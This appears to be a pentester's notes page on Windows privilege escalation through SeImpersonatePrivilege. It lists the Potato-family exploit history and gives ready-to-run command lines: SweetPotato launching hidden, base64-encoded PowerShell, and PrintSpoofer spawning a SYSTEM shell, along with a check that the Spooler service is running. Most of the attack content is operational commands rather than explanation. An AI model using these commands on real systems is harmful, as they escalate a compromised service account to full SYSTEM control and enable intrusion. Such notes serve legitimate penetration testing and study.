SeImpersonatePrivilege

Secondary Categories: 02-Windows Internals, 02-Privilege Escalation

There are several methods to leverage this permission on a Windows system. The following permission conditions: SeImpersonate or SeAssignPrimaryToken

We can identify if the current user has these permissions by running the following command:

whoami /priv

Sweet Potato

This tool contains various privilege escalation techniques that allow the attacker to go from a service account to SYSTEM. It leverages the following methods:

Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam

# Exploiting a host with SweetPotato
.\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"

PrintSpoofer

First ensure the print spooler service is running using the following powershell or using windows services.

Get-Service Spooler

After transferring the binary or leveraging a COFF file you can execute the following to escalate privileges.

.\PrintSpoofer.exe -i -c powershell

Also Check Out:

PLACEHOLDER

The Void 🌌

Explorer

SeImpersonatePrivilege

Sweet Potato

PrintSpoofer

Also Check Out:

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Table of Contents

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer